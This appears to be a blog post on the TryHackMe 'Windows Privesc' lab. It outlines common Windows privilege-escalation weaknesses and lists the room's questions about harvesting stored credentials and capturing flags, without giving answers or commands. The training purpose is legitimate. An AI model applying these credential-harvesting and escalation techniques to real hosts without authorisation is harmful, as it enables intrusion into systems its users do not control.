In this post, We covered most common Windows Privilege Escalation techniques as part of TryHackMe Windows Privesc room. Common Windows privilege escalation techniques include abusing Windows services, credential harvesting and exploiting out of date or un-patched software.

Get OSCP Certificate Notes

During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target.

This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.

Simply put, privilege escalation consists of using given access to a host with “user A” and leveraging it to gain access to “user B” by abusing a weakness in the target system. While we will usually want “user B” to have administrative rights, there might be situations where we’ll need to escalate into other unprivileged accounts before actually getting administrative privileges.

Gaining access to different accounts can be as simple as finding credentials in text files or spreadsheets left unsecured by some careless user, but that won’t always be the case. Depending on the situation, we might need to abuse some of the following weaknesses:

  • Misconfigurations on Windows services or scheduled tasks
  • Excessive privileges assigned to our account
  • Vulnerable software
  • Missing Windows security patches

Room Answers

Users that can change system configurations are part of which group?

The SYSTEM account has more privileges than the Administrator user (aye/nay)

A password for the julia.jones user has been left on the Powershell history. What is the password?

A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?

There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.

Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?

What is the taskusr1 flag?
Get the flag on svcusr1’s desktop.

Get the flag on svcusr2’s desktop.

Get the flag on the Administrator’s desktop.

Get the flag on the Administrator’s desktop.
Get the flag on the Administrator’s desktop.

Video Walkthrough

About the Author

Cybersecurity Trainer MS in Cybersecurity Expertise in Healthcare and Finance Industries Penetration tester and compliance auditor

View Articles